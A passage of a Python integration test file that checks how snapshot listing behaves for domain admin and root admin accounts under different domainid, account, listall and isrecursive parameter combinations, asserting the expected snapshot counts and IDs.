self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as Domain Admin passing domainId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_false(self):
"""
Test listing of Snapshots by passing domainId ,listall="false" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false")
self.debug("List as Domain Admin passing domainId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing domainId ,listall="false" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as Domain Admin passing domainId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing domainId ,listall="false" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as Domain Admin passing domainId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## Domain Admin - Test cases when domainId is passed with no listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid(self):
"""
Test listing of Snapshots by passing domainId parameter as domain admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id)
self.debug("List as Domain Admin passing domainId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_rec_true(self):
"""
Test listing of Snapshots by passing domainId and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots in the subdomain and domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as Domain Admin passing domainId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_rec_false(self):
"""
Test listing of Snapshots by passing domainId and isrecursive="false" parameter as domain admin
        Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as Domain Admin passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Domain Admin - Test cases when account and domainId are passed with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_true(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="true" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true")
self.debug("List as Domain Admin passing domainId and accountId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="true" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as Domain Admin passing domainId and accountId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing account ,domainId , listall="true" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as Domain Admin passing domainId and accountId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Domain Admin - Test cases when account and domainId are passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_false(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false")
self.debug("List as Domain Admin passing domainId and accountId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing account ,domainId and listall="false" and isrecursive="true" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as Domain Admin passing domainId and accountId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing account ,domainId , listall="false" and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as Domain Admin passing domainId and accountId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## Domain Admin - Test cases when account and domainId are passed without listall
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid(self):
"""
        Test listing of Snapshots by passing account and domainId parameters as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id)
self.debug("List as Domain Admin passing domainId and accountId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_rec_true(self):
"""
Test listing of Snapshots by passing account ,domainId and isrecursive="true" parameter as domain admin
        Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as Domain Admin passing domainId and accountId - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_domainadmin_domainid_accountid_rec_false(self):
"""
Test listing of Snapshots by passing account ,domainId and isrecursive="false" parameter as domain admin
Validate that it returns all the Snapshots owned by the account passed in account parameter
"""
self.apiclient.connection.apiKey = self.user_d1_apikey
self.apiclient.connection.securityKey = self.user_d1_secretkey
snapshotList = Snapshot.list(self.apiclient, account=self.account_d11.user[0].username, domainid=self.domain_11.id, isrecursive="false")
self.debug("List as Domain Admin passing domainId and accountId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## ROOT Admin - Test cases with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_true(self):
"""
Test listing of Snapshots by passing listall="true" parameter as admin
Validate that it returns all the Snapshots
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true")
self.debug("List as ROOT Admin - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) >= 11,
True,
"Number of items in list response check failed!!")
        if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d2_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_true_rec_true(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="true")
self.debug("List as ROOT Admin - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) >= 11,
True,
"Number of items in list response check failed!!")
        if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d2_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_true_rec_false(self):
"""
Test listing of Snapshots by passing listall="true" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="true", isrecursive="false")
self.debug("List as ROOT Admin - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) >= 11,
True,
"Number of items in list response check failed!!")
        if (self.checkForExistenceOfValue(snapshotList, self.vm_d1_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d1b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d12b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d2_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_false(self):
"""
Test listing of Snapshots by passing listall="false" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false")
self.debug("List as ROOT Admin - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_false_rec_true(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="true" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="true")
self.debug("List as ROOT Admin - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_listall_false_rec_false(self):
"""
Test listing of Snapshots by passing listall="false" and isrecusrive="false" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, listall="false", isrecursive="false")
self.debug("List as ROOT Admin - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## ROOT Admin - Test cases without passing listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin(self):
"""
Test listing of Snapshots by passing no parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient)
self.debug("List as ROOT Admin %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_rec_true(self):
"""
        Test listing of Snapshots by passing isrecursive="true" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="true")
self.debug("List as ROOT Admin - isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_rec_false(self):
"""
        Test listing of Snapshots by passing isrecursive="false" parameter as admin
Validate that it returns all the Snapshots owned by admin
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, isrecursive="false")
self.debug("List as ROOT Admin passing domainId - isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 1,
True,
"Number of items in list response check failed!!")
if self.checkForExistenceOfValue(snapshotList, self.vm_a_snapshot.id):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
    ## ROOT Admin - Test cases when domainId is passed with listall=true
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_true(self):
"""
Test listing of Snapshots by passing domainid and listall="true" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true")
self.debug("List as ROOT Admin passing domainId - listall=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_true_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, listall="true" and isrecursive="true" parameters as admin
Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="true")
self.debug("List as ROOT Admin passing domainId - listall=true,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_true_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, listall="true" and isrecursive="false" parameters as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="true", isrecursive="false")
self.debug("List as ROOT Admin passing domainId - listall=true,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when domainId is passed with listall=false
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_false(self):
"""
Test listing of Snapshots by passing domainid, listall="false" parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false")
self.debug("List as ROOT Admin passing domainId - listall=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_false_rec_true(self):
"""
        Test listing of Snapshots by passing domainid, listall="false" and isrecursive="true" parameters as admin
        Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="true")
self.debug("List as ROOT Admin passing domainId - listall=false,isrecursive=true %s" % snapshotList)
self.assertEqual(len(snapshotList) == 4,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d111a_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_listall_false_rec_false(self):
"""
        Test listing of Snapshots by passing domainid, listall="false" and isrecursive="false" parameters as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, listall="false", isrecursive="false")
self.debug("List as ROOT Admin passing domainId - listall=false,isrecursive=false %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
## ROOT Admin - Test cases when domainId is passed with no listall parameter
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid(self):
"""
Test listing of Snapshots by passing domainid parameter as admin
Validate that it returns all the Snapshots in the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id)
self.debug("List as ROOT Admin passing domainId - %s" % snapshotList)
self.assertEqual(len(snapshotList) == 3,
True,
"Number of items in list response check failed!!")
if (self.checkForExistenceOfValue(snapshotList, self.vm_d11_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11a_snapshot.id) and
self.checkForExistenceOfValue(snapshotList, self.vm_d11b_snapshot.id)):
accountAccess = True
else:
accountAccess = False
self.assertEqual(accountAccess,
True,
"Account access check failed!!")
@attr("simulator_only", tags=["advanced"], required_hardware="false")
def test_listSnapshot_as_rootadmin_domainid_rec_true(self):
"""
        Test listing of Snapshots by passing domainid and isrecursive="true" parameters as admin
        Validate that it returns all the Snapshots in the subdomain and the domain passed
"""
self.apiclient.connection.apiKey = self.user_a_apikey
self.apiclient.connection.securityKey = self.user_a_secretkey
snapshotList = Snapshot.list(self.apiclient, domainid=self.domain_11.id, isrecursive="true")
self.debug("List as ROOT Admin passing domainId - isrecursive=true %s" % snapshotList)
